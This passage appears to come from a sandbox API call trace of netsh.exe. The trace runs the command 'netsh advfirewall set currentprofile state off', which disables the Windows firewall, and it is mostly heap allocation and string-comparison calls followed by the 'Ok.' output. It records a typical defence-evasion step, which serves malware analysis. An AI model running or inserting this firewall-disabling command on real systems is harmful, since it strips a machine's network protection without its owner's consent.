_Destination=0x1cff6a9e820, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ed00 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8) returned 0x1cff6aac1e0 [0138.766] wcscpy_s (in: _Destination=0x1cff6aac1e0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ea40 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1e) returned 0x1cff6aaed60 [0138.766] wcscpy_s (in: _Destination=0x1cff6aaed60, _SizeInWords=0xf, _Source="currentprofile" | out: _Destination="currentprofile") returned 0x0 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ea00 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6a9ea60 [0138.766] wcscpy_s (in: _Destination=0x1cff6a9ea60, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ed20 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8) returned 0x1cff6aac0c0 [0138.767] wcscpy_s (in: _Destination=0x1cff6aac0c0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa02a0) returned 1 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ec60) returned 1 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ed40 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9eaa0 [0138.767] wcscpy_s (in: _Destination=0x1cff6a9eaa0, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9e820) returned 1 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9eb80) returned 1 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9eb40 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9eb80 [0138.767] wcscpy_s (in: _Destination=0x1cff6a9eb80, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9eaa0) returned 1 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ed40) returned 1 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9eaa0 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8) returned 0x1cff6aac020 [0138.767] wcscpy_s (in: _Destination=0x1cff6aac020, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac1e0) returned 1 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ed00) returned 1 [0138.767] GetProcessHeap () returned 0x1cff6a50000 [0138.767] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ebe0 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1e) returned 0x1cff6aaf090 [0138.768] wcscpy_s (in: _Destination=0x1cff6aaf090, _SizeInWords=0xf, _Source="currentprofile" | out: _Destination="currentprofile") returned 0x0 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aaed60) returned 1 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ea40) returned 1 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9e820 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6a9ec60 [0138.768] wcscpy_s (in: _Destination=0x1cff6a9ec60, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ea60) returned 1 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ea00) returned 1 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ea00 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8) returned 0x1cff6aac040 [0138.768] wcscpy_s (in: _Destination=0x1cff6aac040, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac0c0) returned 1 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ed20) returned 1 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x30) returned 0x1cff6aa3b90 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6a9ea40 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ea60 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.768] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8) returned 0x1cff6aac000 [0138.768] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1e) returned 0x1cff6aaf3c0 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6a9ec20 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8) returned 0x1cff6aac050 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6a9ed00 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6a9ed00, Size=0xe) returned 0x1cff6a9ed40 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6a9ed40, Size=0x24) returned 0x1cff6aaec40 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6aaec40, Size=0x26) returned 0x1cff6aaf0c0 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6aaf0c0, Size=0x2c) returned 0x1cff6aa4010 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6aa4010, Size=0x2e) returned 0x1cff6aa3c90 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6aa3c90, Size=0x4a) returned 0x1cff6aa0360 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6aa0360, Size=0x4c) returned 0x1cff6a9fb20 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6a9fb20, Size=0x56) returned 0x1cff6aa0420 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6aa0420, Size=0x58) returned 0x1cff6a9fa00 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlReAllocateHeap (Heap=0x1cff6a50000, Flags=0x0, Ptr=0x1cff6a9fa00, Size=0x5e) returned 0x1cff6aacb70 [0138.769] GetProcessHeap () returned 0x1cff6a50000 [0138.769] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aacb70) returned 1 [0138.769] lstrcmpiW (lpString1="netsh", lpString2="namespace") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="branchcache") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="advfirewall") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="firewall") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="interface") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="dhcp") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="dnsclient") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="routing") returned -1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="ip") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="ipv6") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="aaaa") returned 1 [0138.770] lstrcmpiW (lpString1="netsh", lpString2="ras") returned -1 [0138.770] _wcsnicmp (_String1="advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0138.770] _wcsnicmp (_String1="advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0138.770] _wcsnicmp (_String1="advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0138.770] _wcsnicmp (_String1="advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0138.770] _wcsnicmp (_String1="advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0138.770] lstrcmpiW (lpString1="advfirewall", lpString2="namespace") returned -1 [0138.770] lstrcmpiW (lpString1="advfirewall", lpString2="branchcache") returned -1 [0138.770] lstrcmpiW (lpString1="advfirewall", lpString2="advfirewall") returned 0 [0138.770] GetProcessHeap () returned 0x1cff6a50000 [0138.770] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ed00 [0138.770] GetProcessHeap () returned 0x1cff6a50000 [0138.770] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ed20 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x5e) returned 0x1cff6a992c0 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ed40 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6a9ed60 [0138.771] wcscpy_s (in: _Destination=0x1cff6a9ed60, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9eda0 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a613c0 [0138.771] wcscpy_s (in: _Destination=0x1cff6a613c0, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6ab6bf0 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8) returned 0x1cff6aabf20 [0138.771] wcscpy_s (in: _Destination=0x1cff6aabf20, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6ab6c10 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1e) returned 0x1cff6aaed30 [0138.771] wcscpy_s (in: _Destination=0x1cff6aaed30, _SizeInWords=0xf, _Source="currentprofile" | out: _Destination="currentprofile") returned 0x0 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6ab6f90 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6ab6b70 [0138.771] wcscpy_s (in: _Destination=0x1cff6ab6b70, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6ab7170 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8) returned 0x1cff6aabf10 [0138.771] wcscpy_s (in: _Destination=0x1cff6aabf10, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a992c0) returned 1 [0138.771] GetProcessHeap () returned 0x1cff6a50000 [0138.771] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ed20) returned 1 [0138.772] GetProcessHeap () returned 0x1cff6a50000 [0138.772] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a613c0) returned 1 [0138.772] GetProcessHeap () returned 0x1cff6a50000 [0138.772] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6ab6b30 [0138.772] lstrcmpiW (lpString1="advfirewall", lpString2="routing") returned -1 [0138.772] lstrcmpiW (lpString1="advfirewall", lpString2="ip") returned -1 [0138.772] lstrcmpiW (lpString1="advfirewall", lpString2="ipv6") returned -1 [0138.772] lstrcmpiW (lpString1="advfirewall", lpString2="aaaa") returned 1 [0138.772] lstrcmpiW (lpString1="advfirewall", lpString2="ras") returned -1 [0138.772] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0138.772] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0138.772] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0138.772] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0138.772] _wcsnicmp (_String1="set", _String2="imp", _MaxCount=0x3) returned 10 [0138.772] _wcsnicmp (_String1="set", _String2="exp", _MaxCount=0x3) returned 14 [0138.772] _wcsnicmp (_String1="set", _String2="con", _MaxCount=0x3) returned 16 [0138.772] _wcsnicmp (_String1="set", _String2="fir", _MaxCount=0x3) returned 13 [0138.772] _wcsnicmp (_String1="set", _String2="mai", _MaxCount=0x3) returned 6 [0138.772] _wcsnicmp (_String1="set", _String2="mon", _MaxCount=0x3) returned 6 [0138.772] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0138.772] _wcsnicmp (_String1="currentprofile", _String2="help", _MaxCount=0xe) returned -5 [0138.772] _wcsnicmp (_String1="currentprofile", _String2="?", _MaxCount=0xe) returned 36 [0138.772] wcstok (in: _String="domainprofile", _Delimiter=" ", _Context=0x191ed772060 | out: _String="domainprofile", _Context=0x191ed772060) returned="domainprofile" [0138.772] _wcsnicmp (_String1="currentprofile", _String2="domainprofile", _MaxCount=0xe) returned -1 [0138.772] wcstok (in: _String="privateprofile", _Delimiter=" ", _Context=0x191ed772090 | out: _String="privateprofile", _Context=0x191ed772090) returned="privateprofile" [0138.772] _wcsnicmp (_String1="currentprofile", _String2="privateprofile", _MaxCount=0xe) returned -13 [0138.772] wcstok (in: _String="publicprofile", _Delimiter=" ", _Context=0x191ed7722d0 | out: _String="publicprofile", _Context=0x191ed7722d0) returned="publicprofile" [0138.772] _wcsnicmp (_String1="currentprofile", _String2="publicprofile", _MaxCount=0xe) returned -13 [0138.772] wcstok (in: _String="currentprofile", _Delimiter=" ", _Context=0x191ed772420 | out: _String="currentprofile", _Context=0x191ed772420) returned="currentprofile" [0138.772] _wcsnicmp (_String1="currentprofile", _String2="currentprofile", _MaxCount=0xe) returned 0 [0138.772] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x65 | out: _String=0x0, _Context=0x65) returned 0x0 [0138.772] lstrcmpiW (lpString1="advfirewall", lpString2="netsh") returned -1 [0138.773] LdrStandardizeSystemPath () returned 0x7ff73dc8bfc4 [0147.327] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x3e092ef540, cchBufferMax=16384 | out: lpBuffer="Ok.\n") returned 0x4 [0147.328] FormatMessageW (in: dwFlags=0x500, lpSource=0x3e092ef540, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x3e092ef520, nSize=0x0, Arguments=0x3e092ef530 | out: lpBuffer="ะǏ") returned 0x5 [0147.328] GetStdHandle (nStdHandle=0xfffffff5) returned 0x274 [0147.328] GetConsoleOutputCP () returned 0x1b5 [0147.790] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0147.790] GetProcessHeap () returned 0x1cff6a50000 [0147.790] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x6) returned 0x1cff6aabf30 [0147.790] GetConsoleOutputCP () returned 0x1b5 [0148.403] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x1cff6aabf30, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0148.404] WriteFile (in: hFile=0x274, lpBuffer=0x1cff6aabf30*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3e092ef4d0, lpOverlapped=0x0 | out: lpBuffer=0x1cff6aabf30*, lpNumberOfBytesWritten=0x3e092ef4d0*=0x5, lpOverlapped=0x0) returned 1 [0148.404] GetProcessHeap () returned 0x1cff6a50000 [0148.404] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aabf30) returned 1 [0148.404] LocalFree (hMem=0x1cff6ab0e30) returned 0x0 [0148.404] FormatMessageW (in: dwFlags=0x500, lpSource=0x7ff73dc8b80c, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x3e092f7550, nSize=0x0, Arguments=0x3e092f7560 | out: lpBuffer="\x71b0\xf6ab\x1cf") returned 0x2 [0148.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x274 [0148.404] GetConsoleOutputCP () returned 0x1b5 [0149.005] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0149.005] GetProcessHeap () returned 0x1cff6a50000 [0149.005] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x3) returned 0x1cff6aac0a0 [0149.005] GetConsoleOutputCP () returned 0x1b5 [0149.435] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x1cff6aac0a0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0149.435] WriteFile (in: hFile=0x274, lpBuffer=0x1cff6aac0a0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x3e092f7500, lpOverlapped=0x0 | out: lpBuffer=0x1cff6aac0a0*, lpNumberOfBytesWritten=0x3e092f7500*=0x2, lpOverlapped=0x0) returned 1 [0149.435] GetProcessHeap () returned 0x1cff6a50000 [0149.435] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac0a0) returned 1 [0149.435] LocalFree (hMem=0x1cff6ab71b0) returned 0x0 [0149.435] GetProcessHeap () returned 0x1cff6a50000 [0149.435] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ea40) returned 1 [0149.435] GetProcessHeap () returned 0x1cff6a50000 [0149.435] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ea60) returned 1 [0149.435] GetProcessHeap () returned 0x1cff6a50000 [0149.435] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac000) returned 1 [0149.435] GetProcessHeap () returned 0x1cff6a50000 [0149.435] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aaf3c0) returned 1 [0149.435] GetProcessHeap () returned 0x1cff6a50000 [0149.435] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ec20) returned 1 [0149.435] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac050) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa3b90) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9eb80) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9eb40) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac020) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9eaa0) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aaf090) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ebe0) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ec60) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9e820) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac040) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ea00) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ea80) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9e9e0) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ec40) returned 1 [0149.436] GetProcessHeap () returned 0x1cff6a50000 [0149.436] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9e800) returned 1 [0149.637] GetProcessHeap () returned 0x1cff6a50000 [0149.637] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa50a0) returned 1 [0149.637] FreeLibrary (hLibModule=0x7ff73dc80000) returned 1 [0149.637] FreeLibrary (hLibModule=0x7ffe62c00000) returned 1 [0149.638] FreeLibrary (hLibModule=0x7ffe5ff60000) returned 1 [0149.647] free (_Block=0x1cff6a46e00) [0149.648] LocalFree (hMem=0x1cff6a72de0) returned 0x0 [0149.648] LocalFree (hMem=0x1cff6a71f60) returned 0x0 [0149.648] LocalFree (hMem=0x1cff6a55390) returned 0x0 [0149.648] LocalFree (hMem=0x1cff6a69990) returned 0x0 [0149.648] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x1cff6a72de0 [0149.648] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x1cff6aaf2a0 [0149.648] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1cff6aaf210 [0149.648] free (_Block=0x1cff6a41730) [0149.648] free (_Block=0x0) [0149.648] free (_Block=0x1cff6a41710) [0149.648] free (_Block=0x1cff6a41750) [0149.648] free (_Block=0x1cff6a46de0) [0149.648] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x1cff6aad290 [0149.651] LocalFree (hMem=0x1cff6aad290) returned 0x0 [0149.651] LocalFree (hMem=0x1cff6a73130) returned 0x0 [0149.651] LocalFree (hMem=0x1cff6a72de0) returned 0x0 [0149.651] free (_Block=0x1cff6a45520) [0149.651] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x7ffe6a810000 [0149.651] FreeLibrary (hLibModule=0x7ffe6a810000) returned 1 [0149.651] LocalFree (hMem=0x1cff6aaf210) returned 0x0 